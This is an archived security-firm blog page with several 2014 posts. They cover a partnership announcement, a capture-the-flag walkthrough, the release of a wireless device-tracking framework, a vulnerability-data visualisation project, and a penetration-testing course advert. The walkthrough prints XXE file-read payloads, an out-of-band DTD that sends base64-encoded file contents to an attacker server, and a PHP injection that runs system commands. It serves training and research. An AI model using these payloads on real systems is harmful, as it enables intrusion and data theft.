Grey bar Blue bar
Share this:

Tue, 5 Aug 2014

SensePost partners with Paterva to offer improved security intelligence

We've been big fans of Maltego and the team at Paterva for a very long time now, and we frequently use this powerful tool for all kinds of fun and interesting stuff, like

We go way back with Andrew and Roelof, who was in fact a founder of SensePost, so today we're super excited to be able to announce a new, strengthened partnership with them under which we have been accredited as an Approved Maltego Solutions Provider. Basically this means the that with Paterva's help we plan to use the powerful Maltego toolset to become better at our job - that is to provide information and information systems to our customer with which they can make sound security decisions. Here's the official news:
SensePost today is proud to announce the completion of a contract that will see the company recognized as the world's first “Approved Maltego Solution Provider” (AMSP) and the exclusive provider of this kind in the UK and Southern Africa.

SensePost was founded in 2000 and has developed into one of the worlds leading Information Security Services companies with offices in London, Cape Town and Pretoria. As trusted advisors it has always been our mission to provide our customers with insight, information and systems to enable them to make strong decisions about Information Security that support their business performance. Whilst this mission has traditionally expressed itself in technical security analysis services like Vulnerability Assessment and Penetration Testing we recognise that the threat landscape is constantly changing and that new and more complex realities necessitate the use of sophisticated new skills, tools and techniques with which to support our clients.

“This strategic alliance perfectly fits the ‘Assess-Detect-Protect-Respond' framework that drives the way we design, sell and deliver our service. It's the perfect evolution of our growing services offering.” says Etienne Greef, CEO of the SensePost group holding company SecureData, who's strategy is at the core of this new initiative.

‘Maltego', built by Paterva, is a powerful suite of software tools used for data mining, link analysis and data visualization, giving the user the ability to extract large volumes of data from diverse sources and then analyze it to understand the patterns and relationships it reveals. In the modern digital age these techniques are used to convert data into information and thereby extract concrete value that can be used for effective decision-making.

Maltego is a highly regarded and popular platform used extensively in Open Source Intelligence Gathering, Infrastructure Analysis for Penetration Testing, Cyber Attack Analysis, Fraud Detection and Investigation, Security Intelligence, Information Security Management, Research and more.

This partnership between SensePost and Paterva (who produce the Maltego software) builds on the companies' shared roots and intellectual heritage and will allow both companies to serve their customers and fulfil their respective missions better.

As an AMSP SensePost will be authorised to provide integration, consulting, support and training for the Maltego tools with full endorsement, support and assistance directly from Paterva. This new capability, combined with an existing wealth of information security skills and experience, uniquely positions SensePost to advise and support clients seeking to exploit the unique strategic advantage the Maltego toolset can offer.

More information on our services and capabilities in this space will follow with our official "launch" in a few weeks time. In the mean, here's a brief summary of our new offering.

Fri, 27 Jun 2014

SensePost Challenge - Winners and Walkthrough

We recently ran our Black Hat challenge where the ultimate prize was a seat on one of our training courses at Black Hat this year. This would allow the winner to attend any one of the following:

The challenge was extremely well received and we received 6 successful entries and numerous other attempts. All the solutions were really awesome and we saw unique attacks, with the first three entrants all solving the challenge in a different way.


As stated, there are multiple ways of solving the challenge, we are just going to outline one way that hopefully provides multiple techniques which can be used in real-world pentests.

Flag 1:

The challenge started with the initial goal of "Read the file /home/spuser/flag1.txt" . When visiting the challenge website there were three initial pages available "index","about" and "login". We had numerous challengers head straight to the login page and attempt SQLi. The other common attack we saw was bruteforce attempts against the login. Both of these were fair attempts, however, the real point of interest should have been the "Feed tester" feature on the index page.

The index page had a feed tester feature, this allowed loading of external XML formatted feeds.
The index page had a feed tester feature, this allowed loading of external XML formatted feeds.

Simply trying out this feature and viewing how it functions. Viewing the feed tester result, we noticed that the contents of the XML formatted RSS feed were echoed and it became clear that this may be vulnerable to XXE. The first step would be to try a simple XML payload such as:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///home/spuser/flag1.txt" >]>

This would fail with an error message of "Something went wrong". The reason for this was that the application was attempting to parse the XML for valid RSS tags. Thus we need to alter our payload to conform to be a valid RSS feed (We used this as a template).

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE title [
<!ELEMENT title ANY >
<!ENTITY xxe SYSTEM "file:///home/spuser/flag1.txt" >]>
<description>Free web building tutorials</description>
<title>RSS Tutorial</title>
<title>XML Tutorial</title>
<description>New XML tutorial on W3Schools</description>

And we should see the contents of flag1.txt displayed in our feed:
And we've captured flag1
And we've captured flag1 Now onto flag 2...

Flag 2:

The contents of flag1.txt revealed the "access code" we needed to log into the site. So we went over to the login page and entered an email address as the username and the access code as our password. Viola, we now have access to the "main" page as well. This page revealed some new functionality, namely the ability to update our user details. Unfortunately there was no upload function here, so there goes the easy shell upload. We updated the user account and used Burp to look at the submitted request.

The submitted POST request
The submitted POST request

It looks like we have some more XML being submitted.. Again we tried XXE and found that using "file://" in our payload created an error. There were ways around this, however the returned data would be truncated and we would not be able to see the full contents of flag2.txt... When stuck with XXE and not being able to see the result (or complete result) there is always the chance that we can get the data out via the network. To do this we needed to generate a payload that would allow us to fetch an external DTD and then "submit" the contents of our target file to a server under our control. Our payload on our server looked like this:

<!ENTITY % data SYSTEM "php://filter/read=convert.base64-encode/resource=/home/spuser/flag2.txt">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://x.x.x.x:8000/?%data;'>">

Note how we had to use the php://filter function to base64 encode our payload. This allowed us to avoid control characters breaking the XML structure and URL format. Finally, the payload submitted to the challenge server simply consisted of:

<?xml version="1.0" ?>
<!ENTITY % sp SYSTEM "http://x.x.x.x:8000/ev.xml">

We didn't really need to worry about what happens after our "XXE payload" because the xmldecoder had already submitted the contents of file2.txt to our server before the application code started parsing the XML document. When submitting the payload we needed to encode the % and & symbols otherwise these broke the XML decoder.

Our payload was correctly encoded submitted to the profile update function.
Our payload was correctly encoded submitted to the profile update function.

As soon as the XML decoder parsed our malicious payload, we would receive the base64 encoded contents on our server:

The challenge server would send the contents of flag2.txt to our server.
The challenge server would send the contents of flag2.txt to our server.

Now it was a simple matter of decoding the payload and we had the second flag. This was not the only way to get flag 2! It was the most "fun" way of doing it though and used a really handy method. Remember it for your next pentest...

Flag 3 AKA "get your name on the wall of fame":

Flag 2 gave us the access code we needed to unlock the final piece of the challenge. This presented us with the "add a feed" feature. Again, we first tried out the new feature to see what was happening. Our first observation was that nothing happens when we just add the feed. However, things do get interesting when we view our new feed. The new feed is displayed in a freshly generated php page. This should have triggered warning bells, we've got php being generated, how about we inject some php? Looking at the feed creation we again note that the payload consists of some XML being submitted. Now if we wanted to inject a shell, how would we do this without breaking the XML structure? Two options were available to us, one, encoding and two XML trickery. The encoding option was simple, simply encode all the angle brackets of our php payload and then insert it into our XML payload. This worked because php was kind enough to decode the URL encoded elements AFTER the XML decoder had done it's thing. Thus the XML validated successfully and our encoded characters got decoded back into their original form before being inserted into our new php file. The second option was to surround our php code with CDATA tags. The CDATA tags told the XML decoder not to parse the content surrounded by these tags as XML but rather treat it as free text. Simple enough and quicker than manually encoding our payload. Thus our new payload would look as follows:

<feed><name><![CDATA[<?php system('echo etienne >> /home/spuser/wof.txt') ?>]]></name><url></url></feed>

Now we had a new link created in the feeds list. We could navigate to this new feed and our php code would get executed as the page loaded. And boom, just like that our name should be on the "Wall of Fame". We could easily verify this by using the XXE from flag 1 and fetching /home/spuser/wof.txt instead. Below is the "Wall of Fame" at time of writing:

  • secdefect

  • Ron

  • ftard

  • send9 wuz here

  • @leonjza was here :)

  • harry@nsense was here 1403445693

  • #uushomo@1403472051

  • marquee was here

  • El Gato!El Gato!

  • melih_sarica_ms_isr_com_tr_was_here


Congratulations to everyone who finished the challenge! However, there could only be one winner. The winner is Espes, who narrowly beat our two runners up to win a training ticket for any one of our course at Black Hat Vegas 2014.

The two runners up who both can claim one of our awesome 2014 t-shirts:

Vitaly aka @send9

Sash aka @secdefect

Education is the most powerful weapon which you can use to change the world - Mandela
Education is the most powerful weapon which you can use to change the world - Nelson Mandela

Fri, 13 Jun 2014

Release the hounds! Snoopy 2.0

Friday the 13th seemed like as good a date as any to release Snoopy 2.0 (aka snoopy-ng). For those in a rush, you can download the source from GitHub, follow the file, and ask for help on this mailing list. For those who want a bit more information, keep reading.

What is Snoopy?

Snoopy is a distributed, sensor, data collection, interception, analysis, and visualization framework. It is written in a modular format, allowing for the collection of arbitrary signals from various devices via Python plugins.

It was originally released as a PoC at 44Con 2012, but this version is a complete re-write, is 99% Python, modular, and just feels better. The 'modularity' is possibly the most important improvement, for reasons which will become apparent shortly.

Tell me more!

We've presented our ongoing work with snoopy at a bunch of conferences under the title 'The Machines that Betrayed Their Masters'. The general synopsis of this research is that we all carry devices with us that emit wireless signals that could be used to:

  • Uniquely identify the device / collection of devices

  • Discover information about the owner (you!)

This new version of snoopy extends this into other areas of RFID such as; Wi-Fi, Bluetooth, GSM, NFC, RFID, ZigBee, etc. The modular design allows each of these to be implemented as a python module. If you can write Python code to interface with a tech, you can slot it into a snoopy-ng plugin.

We've also made it much easier to run Snoopy by itself, rather than requiring a server to sync to as the previous version did. However, Snoopy is still a distributed framework and allows the deployment of numerous Snoopy devices over some large area, having them all sync their data back to one central server (or numerous hops through multiple devices and/or servers). We've been working on other protocols for data synchronisation too - such as XBee. The diagram below illustrates one possible setup:

Architecture Diagram

OK - but how do I use it?

I thought you'd never ask! It's fairly straight forward.

Hardware Requirements

Snoopy should run on most modern computers capable of running Linux, with the appropriate physical adapters for the protocols you're interested in. We've tested it on:

  • Laptop

  • Nokia N900 (with some effort)

  • Raspberry Pi (SnooPi!)

  • BeagleBone Black (BeagleSnoop!)

In terms of hardware peripherals, we've been experimenting with the following:
Wi-FiAWUS 036H100m
ZigBeeDigi Xbee1km to 80kms
GSMRTL2832U SDR35kms

The distances can be increased with appropriate antennas. More on that in a later blog post.

Software Requirements

Essentially a Linux environment is required, but of more importance are the dependencies. These are mostly Python packages. We've tested Snoopy on Kali 1.x, and Ubuntu 12.04 LTS. We managed to get it working on Maemo (N900) too. We're investigating getting it running on OpenWRT/ddWRT. Please let us know if you have success.


It should be as simple as:
git clone
cd snoopy-ng
bash ./


Run Snoopy with the command 'snoopy', and accept the License Agreement. We'd recommend you refer to the file for more information, but here are a few examples to get you going:

1. To save data from the wireless, sysinfo, and heartbeat plugins locally:

snoopy -v -m wifi:iface=wlanX,mon=True -m sysinfo -m heartbeat -d <drone name> -l <location name>

2. To sync data from a client to a server:


snoopy_auth --create <drone name> # Create account
snoopy -v -m server # Start server plugin

snoopy -v -m wifi:iface=mon0 -s http://<server hostname>:9001/ -d <drone name> -l <location name> -k

Data Visualization

Maltego is the preferred tool to perform visualisation, and where the beauty of Snoopy is revealed. See the for instructions on how to use it.

I heard Snoopy can fly?

You heard right! Well, almost right. He's more of a passenger on a UAV:

There sure is a lot of stunt hacking in the media these days, with people taking existing hacks and duct-taping them to a cheap drone for media attention. We were concerned to see stories on snoopy airborne take on some of this as the message worked its way though the media. What's the benefit of having Snoopy airborne, then? We can think of a few reasons:

  1. Speed: We can canvas a large area very quickly (many square kilometres)

  2. Stealth: At 80m altitude the UAV is out of visual/audible range

  3. Security: It's possible to bypass physical security barriers (walls, men with guns, dogs)

  4. TTL (Tag, Track, Locate): It's possible to search for a known signature, and follow it

We're exploring the aerial route a whole lot. Look out for our DefCon talk in August for more details.

Commercial Use

The license under which Snoopy is released forbids gaining financially from its use (see LICENSE.txt). We have a separate license available for commercial use, which includes extra functionality such as:

  • Syncing data via XBee

  • Advanced plugins

  • Extra/custom transforms

  • Web interface

  • Prebuilt drones

Get in contact ( / if you'd like to engage with us.

Using Maltego to explore threat & vulnerability data

This blog post is about the process we went through trying to better interpret the masses of scan results that automated vulnerability scanners and centralised logging systems produce. A good example of the value in getting actionable items out of this data is the recent Target compromise. Their scanning solutions detected the threat that lead to their compromise, but no humans intervened. It's suspected that too many security alerts were being generated on a regular basis to act upon.

The goal of our experiment was to steer away from the usual data interrogation questions of "What are the top N vulnerabilities my scanner has flagged with a high threat?" towards questions like "For how many of my vulnerabilities do public exploits exist?". Near the end of this exercise we stumbled across this BSides talk "Stop Fixing All The Things". Theses researchers took a similar view-point: "As security practitioners, we care about which vulnerabilities matter". Their blog post and video are definitely worth having a look at.

At SensePost we have a Managed Vulnerability Scanning service (MVS). It incorporates numerous scanning agents (e.g. Nessus, Nmap, Netsparker and a few others), and exposes an API to interact with the results. This was our starting point to explore threat related data. We could then couple this data with remote data sources (e.g. CVE data, data).

We chose to use Maltego to explore the data as it's an incredibly powerful data exploration and visualisation tool, and writing transforms is straight forward. If you'd like to know more about Maltego here are some useful references:

What we ended up building were:

  • Transforms to explore our MVS data

  • A CVE / API engine

  • Transforms to correlate between scanner data and the created APIs

  • Maltego Machines to combine our transforms

So far our API is able to query a database populated from CVE XML files and data from (they were kind enough to give us access to their CVE inclusive data set). It's a standalone Python program that pulls down the XML files, populates a local database, and then exposes a REST API. We're working on incorporating other sources - threat feeds, other logging/scanning systems. Let us know if you have any ideas. Here's the API in action:

Parsing CVE XML data and exposing REST API
Parsing CVE XML data and exposing REST API

Querying a CVE. We see 4 public exploits are available.
Querying a CVE. We see 4 public exploits are available.

It's also worth noting that for the demonstrations that follow we've obscured our clients' names by applying a salted 'human readable hash' to their names. A side effect is that you'll notice some rather humorous entries in the images and videos that follow.

Jumping into the interesting results, these are some of the tasks that we can perform:

  • Show me all hosts that have a critical vulnerability within the last 30 days

  • Show me vulnerable hosts for which public exploit code exists

  • Show me all hosts for which a vulnerability exists that has the word 'jmx-console' in the description

  • Show me all hosts on in my DMZ that have port 443 open

  • Given a discovered vulnerability on a host, show me all other hosts with the same vulnerability

  • Show me a single diagram depicting every MVS client, weighted by the threat of all scans within the last week

  • Show me a single diagram depicting every MVS client, weighted by the availability of public exploit code

  • Given a CPE, show me all hosts that match it

Clicking the links in the above scenarios will display a screenshot of a solution. Additionally, two video demonstrations with dialog are below.

Retrieving all recent vulnerabilities for a client 'Bravo Tango', and checking one of them to see if there's public exploit code available.
Retrieving all recent vulnerabilities for a client 'Bravo Tango', and checking one of them to see if there's public exploit code available.

Exploring which clients/hosts have which ports open
Exploring which clients/hosts have which ports open

In summary, building 'clever tools' that allow you to combine human insight can be powerful. An experiences analyst with the ability to ask the right questions, and building tools that allows answers to be easily extracted, yields actionable tasks in less time. We're going to start using this approach internally to find new ways to explore the vulnerability data sets of our scanning clients and see how it goes.

In the future, we're working on incorporating other data sources (e.g. LogRhythm, Skybox). We're also upgrading our MVS API - you'll notice a lot of the Maltego queries are cumbersome and slow due to its current linear exploration approach.

The source code for the API, the somewhat PoC Maltego transforms, and the MVS (BroadView) API can be downloaded from our GitHub page, and the MVS API from here. You'll need a paid subscription to incorporate the data, but it's an initiative definitely worth supporting with a very fair pricing model. They do put significant effort in correlating CVEs. See this page for more information.

Do get in touch with us (or comment below) if you'd like to know more about the technical details, chat about the API (or expand on it), if this is a solution you'd like to deploy, or if you'd just like to say "Hi".

Tue, 13 May 2014

BlackOps Hacking Training - Las Vegas

Get some.

BlackOps you say?
At SensePost we have a range of courses in our Hacking by Numbers reloaded series. We feel each one has its own special place. I've delivered almost all the courses over the years, but my somewhat biased favourite is our recently updated BlackOps Edition. Myself (Glenn) and Vlad will be presenting this course at BlackHat Vegas in August.

Where Does BlackOps fit in?
Our introductory courses (Cadet and Bootcamp) are meant to establish the hacker mindset - they introduce the student to psychological aspects of an attacker, and build on that to demonstrate real world capability. BlackOps is designed for students who understand the basics of hacking (either from attending Bootcamp/Cadet, or from real-world experience) and want to acquire deeper knowledge of techniques we use. We built the course based on our 13 years of experience of performing security assessments.

But really, what's the course about?
This course is aimed at those who've been performing penetration testing for a while, but still feel a bit lost when they've compromised a host, or network and want to know the best possible approach to take for the next step. All of the labs in this course come from real life assessments, with the final lab being a full-blown social engineering attack against an admin with pivoting, exfiltration and the works. Specifically, we're going to cover the following topics:

1. Advanced Targeting
A hacker who can quickly and effectively identify targets is a successful attacker. We'll be looking at non-standard techniques for identifying targets, such as mDNS, IPv6, and other rapid reconnaissance techniques.

3. Compromise
You may know how to roll a generic metasploit payload, but we'll be looking at some lesser utilised approaches to compromise. From WPAD injection, to rogue routers in IPv6, to good old smbrelay attacks, to crypto attacks against obfuscated credentials.

4. Privilege Escalation
So you've gotten a shell, now what?
Following on somewhat succinctly, how do you elevate your privileges after compromising a box? Everyone wants to be root or enterprise admin, but how do you go about this without raising the alarm and keeping your shell?

5. Pivoting
Don't underestimate the importance, or intricacies of this topic. Once you've compromised a lowly network edge server, or the receptionist PC, how do you bounce through that box to get to the good stuff, three DMZs deep? We'll show you how. A must-have for every hackers box of tricks.

6. Open Source Intelligence (OSINT)
Finding out as much as possible about an adversary from publicly available information is one of the most important steps of any hack. This relates to both infrastructure (domains, IP ranges, etc) and personnel. In this section we'll focus mainly on the latter. How can you find out more information about the girlfriend of the son of your target company's CEO? We'll show you. Why would you want to? A good social engineering attack abuses trust relationships, so nothing makes a dad click on that dodgy looking email if it was from his son.

7. HIPS Evasion
Hackers don't like getting caught. So we'll teach you how to evade 100% (yes, 100%) of anti-virus products on the market, as well as hiding from smart traffic filtering devices. Bring your own ninja outfits, we'll provide the skill-set.

8. Client Side Attacks
The weakest layer of the OSI stack - the human. Trust us, if you really want to compromise an organization, going after the receptionist's outdated Windows box is the first stepping stone. After all, why wouldn't she open an email that appears to come from her boss, and has a harmless .xls attached?

Each module of the above modules has a theory section followed by a practical lab to allow you to practise your newly acquired skills. The course finishes with a Capture-the-Flag, with a grand prize. Honestly, this final lab is enjoyable and guaranteed to bring a smile on your face whilst doing it.

We're looking forward to sharing out knowledge, experience, and passion for security with you. Please sign up here.

-Glenn & Vlad